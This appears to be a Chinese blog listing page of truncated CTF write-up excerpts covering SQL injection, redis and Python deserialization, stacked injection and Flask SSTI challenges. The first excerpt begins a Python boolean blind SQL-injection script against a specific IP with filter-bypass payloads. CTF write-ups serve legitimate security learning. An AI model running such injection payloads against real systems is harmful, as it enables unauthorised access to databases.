武汉大学的CTF,难的简单的都有,最近比赛是真滴多,打完金盆洗手了 Easy_sqli 考点:bool盲注,双写绕过 简单,没啥好讲的 #wh1sper import requests host = 'http://218.197.154.9:10011/login.php#' def mid(bot, top): return (int)(0.5 * (top + bot)) def sqli(): name = '' for j in range(1, 250): top = 126 bot = 32 while 1: babyselect = '(seselectlect f111114g frfromom f1ag_y0u_wi1l_n3ver_kn0w)'# select = "1' oorr ascii(substr("+babyselect+",{},1))>{}……
Web2 考点:redis弱口令,python反序列化 BUU上面的环境需要 Shadowsocks 代理才能访问,配置这个都搞了半天(tcl 下载配置shadowsocks sudo apt-get install shadowsocks 连接代理 sslocal -s node3.buuoj.cn -p 11111 -k 123456 报错:AttributeErro……
西电校赛,难度适中,本人内鬼选手,看了下题。 id_wife 考点:堆叠注入 不是很难,最开始没想到堆叠,跑去盲注,差点怀疑人生 测出来堆叠之后就简单了,其他过滤什么我不知道,直接参考新春战疫的一道sqli,Handle……
本次De1CTF是XCTF的第一场分站赛,不但吸引了国内许许多多的战队,还有非常多的国外的战队,据说前26名一半都是国外的。当然比赛题目也是非常的难,感觉自己在这种大比赛上面还是不能发挥什么作用。 check in……
之前广外CTF的时候才刚刚接触CTF,当时只做了一道随机数爆破,现在来复现 你的名字 考点:flaskSSTI、绕过{{}}过滤、黑名单过滤逻辑错误 很详细的SSTI>>:https://xz.……